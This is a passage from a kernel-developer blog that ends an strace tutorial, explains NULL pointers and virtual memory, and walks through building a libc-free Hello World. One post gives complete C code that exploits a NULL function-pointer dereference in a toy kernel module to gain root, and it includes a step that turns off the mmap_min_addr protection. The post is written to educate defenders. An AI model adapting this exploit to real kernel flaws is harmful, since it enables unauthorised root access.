Those write() syscalls are the SQL queries -- we can make out the SELECT foo FROM bar, and then it trails off. To see the rest, note the file descriptor the syscalls are happening on -- the first argument of read() or write(), which is 3 here. Pass that file descriptor to -e write=:

$ strace -p 9026 -e write=3
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
 | 00000  30 00 00 00 03 53 45 4c  45 43 54 20 74 69 6d 65  0....SEL ECT time |
 | 00010  73 74 61 6d 70 20 46 52  4f 4d 20 61 72 74 69 66  stamp FR OM artif |
 | 00020  61 63 74 73 20 57 48 45  52 45 20 69 64 20 3d 20  acts WHE RE id =  |
 | 00030  31 34 35 34                                       1454              |

and we see the whole query. It's both printed and in hex, in case it's binary. We could also get the whole thing with an option like -s 1024, but then we'd see all the data coming back via read() -- the use of -e write= lets us pick and choose.

Filtering the Output
Sometimes the full syscall trace is too much -- you just want to see what files the program touches, or when it reads and writes data, or some other subset. For this the -e trace= option was made. You can select a named suite of system calls like -e trace=file (for syscalls that mention filenames) or -e trace=desc (for read() and write() and friends, which mention file descriptors), or name individual system calls by hand. We'll use this option in the next example.

Child Processes
Sometimes the process you trace doesn't do the real work itself, but delegates it to child processes that it creates. Shell scripts and Make runs are notorious for taking this behavior to the extreme. If that's the case, you may want to pass -f to make strace "follow forks" and trace child processes, too, as soon as they're made.

For example, here's a trace of a simple shell script, without -f:

$ strace -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f4b68af5770) = 11948
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 11948
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0x7fffc3473604, WNOHANG, NULL) = -1 ECHILD (No child processes)

Not much to see here -- all the real work was done inside process 11948, the one created by that clone() syscall.

Here's the same script traced with -f (and the trace edited for brevity):

$ strace -f -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(Process 10738 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f5a93f99770) = 10738
[pid 10682] wait4(-1, Process 10682 suspended

[pid 10738] open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3
[pid 10738] dup2(3, 1)                  = 1
[pid 10738] close(3)                    = 0
[pid 10738] execve("/bin/ls", ["ls", ".git/objects/28"], [/* 25 vars */]) = 0
[... setup of C standard library omitted ...]
[pid 10738] stat(".git/objects/28", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
[pid 10738] open(".git/objects/28", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 3
[pid 10738] getdents(3, /* 40 entries */, 4096) = 2480
[pid 10738] getdents(3, /* 0 entries */, 4096) = 0
[pid 10738] close(3)                    = 0
[pid 10738] write(1, "04102fadac20da3550d381f444ccb5676"..., 1482) = 1482
[pid 10738] close(1)                    = 0
[pid 10738] close(2)                    = 0
[pid 10738] exit_group(0)               = ?
Process 10682 resumed
Process 10738 detached
<... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 10738
--- SIGCHLD (Child exited) @ 0 (0) ---

Now this trace could be a miniature education in Unix in itself -- future blog post? The key thing is that you can see ls do its work, with that open() call followed by getdents().

The output gets cluttered quickly when multiple processes are traced at once, so sometimes you want -ff, which makes strace write each process's trace into a separate file.

Use #2: Why/Where Is A Program Stuck?
Sometimes a program doesn't seem to be doing anything. Most often, that means it's blocked in some system call. Strace to the rescue.

$ strace -p 22067
Process 22067 attached - interrupt to quit
flock(3, LOCK_EX

Here it's blocked trying to take out a lock, an exclusive lock (LOCK_EX) on the file it's opened as file descriptor 3. What file is that?

$ readlink /proc/22067/fd/3
/tmp/foobar.lock

Aha, it's the file /tmp/foobar.lock. And what process is holding that lock?

$ lsof | grep /tmp/foobar.lock
 command   21856       price    3uW     REG 253,88       0 34443743 /tmp/foobar.lock
 command   22067       price    3u      REG 253,88       0 34443743 /tmp/foobar.lock

Process 21856 is holding the lock. Now we can go figure out why 21856 has been holding the lock for so long, whether 21856 and 22067 really need to grab the same lock, etc.

Other common ways the program might be stuck, and how you can learn more after discovering them with strace:

  • Waiting on the network. Use lsof again to see the remote hostname and port.
  • Trying to read a directory. Don't laugh -- this can actually happen when you have a giant directory with many thousands of entries. And if the directory used to be giant and is now small again, on a traditional filesystem like ext3 it becomes a long list of "nothing to see here" entries, so a single syscall may spend minutes scanning the deleted entries before returning the list of survivors.
  • Not making syscalls at all. This means it's doing some pure computation, perhaps a bunch of math. You're outside of strace's domain; good luck.

Uses #3, #4, ...
A post of this length can only scratch the surface of what strace can do in a sysadmin's toolbox. Some of my other favorites include

  • As a progress bar. When a program's in the middle of a long task and you want to estimate if it'll be another three hours or three days, strace can tell you what it's doing right now -- and a little cleverness can often tell you how far that places it in the overall task.
  • Measuring latency. There's no better way to tell how long your application takes to talk to that remote server than watching it actually read() from the server, with strace -T as your stopwatch.
  • Identifying hot spots. Profilers are great, but they don't always reflect the structure of your program. And have you ever tried to profile a shell script? Sometimes the best data comes from sending a strace -tt run to a file, and picking through to see when each phase of your program started and finished.
  • As a teaching and learning tool. The user/kernel boundary is where almost everything interesting happens in your system. So if you want to know more about how your system really works -- how about curling up with a set of man pages and some output from strace?


Monday Apr 12, 2010

Much ado about NULL: Exploiting a kernel NULL dereference

Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module.

A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same.


In order to allow you to play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer dereference, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11.

Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing.

While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root.

If we build and load the nullderef module, and execute

echo 1 > /sys/kernel/debug/nullderef/null_read

our shell will crash, and we'll see something like the following on the console (on a physical console, over a serial port, or in dmesg):

BUG: unable to handle kernel NULL pointer dereference at 00000000

IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef]

The kernel address space

We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it?

For various reasons, that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing.

In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it.

A diagram of virtual memory and memory protection
A diagram of virtual memory and memory protection

Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there are a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points, and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a program wants to write to a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the arguments, does the write, and returns to the calling program.

This all has at least two important consequences for exploiting NULL pointer dereferences:

First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process!

Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode.

We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:

(As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.)

#include <sys/mman.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main() {
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY);
  write(fd, "1", 1);

  printf("Triggered a kernel NULL pointer dereference!\n");
  return 0;
}
Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit.

Putting it together

To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic.

So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory.

We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses)

struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_creds will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions.

Putting it together, we get:

#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

struct cred;
struct task_struct;

typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon);
typedef int (*commit_creds_t)(struct cred *new);

prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

/* Find a kernel symbol in /proc/kallsyms */
void *get_ksym(char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    char c, sym[512];
    void *addr;

    while (fscanf(f, "%p %c %511s\n", &addr, &c, sym) > 0)
        if (!strcmp(sym, name))
            return addr;
    return NULL;
}

/* This function will be executed in kernel mode. */
void get_root(void) {
    commit_creds(prepare_kernel_cred(0));
}

int main() {
  prepare_kernel_cred = get_ksym("prepare_kernel_cred");
  commit_creds        = get_ksym("commit_creds");

  if (!(prepare_kernel_cred && commit_creds)) {
      fprintf(stderr, "Kernel symbols not found. "
                      "Is your kernel older than 2.6.29?\n");
      return 1;
  }

  /* Put a pointer to our function at NULL */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  void (**fn)(void) = NULL;
  *fn = get_root;

  /* Trigger the kernel */
  int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY);
  write(fd, "1", 1);

  if (getuid() == 0) {
      char *argv[] = {"/bin/sh", NULL};
      execve("/bin/sh", argv, NULL);
  }

  fprintf(stderr, "Something went wrong?\n");
  return 1;
}
(struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.)

So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but, there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it.


One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild.

Monday Mar 29, 2010

Much ado about NULL: An introduction to virtual memory

Here at Ksplice, we're always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.

If you've ever programmed in C, you've probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded "Segmentation Fault". Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today's installment, we'll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I'll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!

What's in a pointer?

There's nothing fundamentally magical about pointers in C (or assembly, if that's your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer's memory. We can write a C program to print out a random pointer:

#include <stdio.h>
int main(int argc, char **argv) {
  printf("The argv pointer = %d\n", argv);
  return 0;
}

Which, if you run it on my machine, prints:

The argv pointer = 1680681096

(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that's just a notational thing. They're still just integers.)

NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it's just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.

But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

Diagram of Physical Memory Addresses
Mapping pointers directly to hardware memory

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you're browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It's actually even worse than that: a bug in IE can even take down the entire operating system.

This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means is that every program running on your computer has its own namespace for pointers (from 0 to 2^32 - 1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other's memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program's address space to different pieces of physical memory.

A diagram of virtual memory

The world with Virtual Memory. Dark gray shows portions of the address space that refer to valid memory.


One feature of this setup is that while each process has its own 2^32 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.

Because each application has its own address space, however, it is free to do with it as it wants. For instance, you're welcome to declare that NULL should be a valid address in your application. We refer to this as "mapping" the NULL page, because you're declaring that that area of memory should map to some piece of physical memory.

On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:

void *mmap(void *addr, size_t length, int prot, int flags,
           int fd, off_t offset);

Let's go through those arguments in order (all of this information comes from the man page):

addr: This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.

length: The length of the region the application wants to map. Memory can only be mapped in increments of a "page", which is 4k (4096 bytes) on x86 processors.

prot: Short for "protection", this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.

flags: Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.

fd: The primary use of mmap is not just as a memory allocator, but to map files on disk into a process's address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we're going to pass MAP_ANONYMOUS in flags, which indicates that we don't want to map a file, and fd is irrelevant.

offset: This argument would be used with fd to indicate which portion of a file we wanted to map.

mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.

If we just want to be able to read and write the NULL pointer, we'll want to set addr to 0 and length to 4096, in order to map the first page of memory. We'll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we'll set them to -1 and 0 respectively.

Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!

(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you'll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)

#include <sys/mman.h>
#include <stdio.h>

int main() {
  int *ptr = NULL;
  if (mmap(NULL, 4096, PROT_READ|PROT_WRITE,
           MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,
           -1, 0) == MAP_FAILED) {
    perror("Unable to mmap(NULL)");
    fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
    return 1;
  }
  printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
  *ptr = 17;
  printf("Now it's: %d\n", *ptr);
  return 0;
}
Next time, we'll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel's address space. And, I'll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!


Tuesday Mar 16, 2010

Hello from a libc-free world! (Part 1)

As an exercise, I want to write a Hello World program in C simple enough that I can disassemble it and be able to explain all of the assembly to myself.

This should be easy, right?

This adventure assumes compilation and execution on a Linux machine. Some familiarity with reading assembly is helpful.

Here's our basic Hello World program:

jesstess@kid-charlemagne:~/c$ cat hello.c
#include <stdio.h>

int main()
{
  printf("Hello World\n");
  return 0;
}

Let's compile it and get a bytecount:

jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10931 hello

Yikes! Where are 11 Kilobytes worth of executable coming from? objdump -t hello gives us 79 symbol-table entries, most of which we can blame on our using the standard library.

So let's stop using it. We won't use printf so we can get rid of our include file:

jesstess@kid-charlemagne:~/c$ cat hello.c
int main()
{
  char *str = "Hello World";
  return 0;
}

Recompiling and checking the bytecount:

jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10892 hello

What? That barely changed anything!

The problem is that gcc is still using standard library startup files when linking. Want proof? We'll compile with -nostdlib, which according to the gcc man page won't "use the standard system libraries and startup files when linking. Only the files you specify will be passed to the linker".

jesstess@kid-charlemagne:~/c$ gcc -nostdlib -o hello hello.c
/usr/bin/ld: warning: cannot find entry symbol _start; defaulting to 00000000004000e8

Well, it's just a warning; let's check it anyway:

jesstess@kid-charlemagne:~/c$ wc -c hello
1329 hello

That looks pretty good! We got our bytecount down to a much more reasonable size (an order of magnitude smaller!)...

jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

...at the expense of segfaulting when it runs. Hrmph.

For fun, let's get our program to be actually runnable before digging into the assembly.

So what is this _start entry symbol that appears to be required for our program to run? Where is it usually defined if you're using libc?

From the perspective of the linker, by default _start is the actual entry point to your program, not main. It is normally defined in the crt1.o ELF relocatable. We can verify this by linking against crt1.o and noting that _start is now found (although we develop other problems by not having defined other necessary libc startup symbols):

# Compile the source files but don't link
jesstess@kid-charlemagne:~/c$ gcc -Os -c hello.c
# Now try to link
jesstess@kid-charlemagne:~/c$ ld /usr/lib/crt1.o -o hello hello.o
/usr/lib/crt1.o: In function `_start':
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:106: undefined reference to `__libc_csu_fini'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:107: undefined reference to `__libc_csu_init'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:113: undefined reference to `__libc_start_main'

This check conveniently also tells us where _start lives in the libc source: sysdeps/x86_64/elf/start.S for this particular machine. This delightfully well-commented file exports the _start symbol, sets up the stack and some registers, and calls __libc_start_main. If we look at the very bottom of csu/libc-start.c we see the call to our program's main:

result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);

and down the rabbit hole we go.

So that's what _start is all about. Conveniently, we can summarize what happens between _start and the call to main as "set up a bunch of stuff for libc and then call main", and since we don't care about libc, let's just export our own _start symbol that just calls main and link against that:

jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

_start:
    call main

Compiling and running with our stub _start assembly file:

jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

Hurrah, our compilation problems go away! However, we still segfault. Why? Let's compile with debugging information and take a look in gdb. We'll set a breakpoint at main and step through until the segfault:

jesstess@kid-charlemagne:~/c$ gcc -g -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ gdb hello
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu"...
(gdb) break main
Breakpoint 1 at 0x4000f4: file hello.c, line 3.
(gdb) run
Starting program: /home/jesstess/c/hello

Breakpoint 1, main () at hello.c:5
5      char *str = "Hello World";
(gdb) step
6      return 0;
(gdb) step
7    }
(gdb) step
0x00000000004000ed in _start ()
(gdb) step
Single stepping until exit from function _start,
which has no line number information.
main () at helloint.c:4
4    {
(gdb) step
Breakpoint 1, main () at helloint.c:5
5      char *str = "Hello World";
(gdb) step
6      return 0;
(gdb) step
7    }
(gdb) step
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000001 in ?? ()

Wait, what? Why are we running through main twice? ...It's time to look at the assembly:

jesstess@kid-charlemagne:~/c$ objdump -d hello
hello:     file format elf64-x86-64

Disassembly of section .text:

00000000004000e8 <_start>:
4000e8: e8 03 00 00 00            callq 4000f0 <main>
4000ed: 90                        nop
4000ee: 90                        nop
4000ef: 90                        nop

00000000004000f0 <main>:
4000f0: 55                        push %rbp
4000f1: 48 89 e5                  mov %rsp,%rbp
4000f4: 48 c7 45 f8 03 01 40      movq $0x400103,-0x8(%rbp)
4000fb: 00
4000fc: b8 00 00 00 00            mov $0x0,%eax
400101: c9                        leaveq
400102: c3                        retq

D'oh! Let's save a detailed examination of the assembly for later, but in brief: when we return from the callq to main we hit some nops and run right back into main. Since we re-entered main without putting a return instruction pointer on the stack as part of the standard prologue for calling a function, the second call to retq tries to pop a bogus return instruction pointer off the stack and jump to it and we bomb out. We need an exit strategy.

Literally. After the return from callq, move 1, the syscall number for SYS_exit, into %eax, and because we want to say that we're exiting cleanly, put a status of 0, SYS_exit's only argument, into %ebx. Then make the interrupt to drop into the kernel with int $0x80.

jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

_start:
    call main
    movl $1, %eax
    xorl %ebx, %ebx
    int $0x80
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello

Success! It compiles, it runs, and if we step through this new version under gdb it even exits normally.

Hello from a libc-free world!

Stay tuned for Part 2, where we'll walk through the parts of the executable in earnest and watch what happens to it as we add complexity, in the process understanding more about x86 linking and calling conventions and the structure of an ELF binary.



Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.

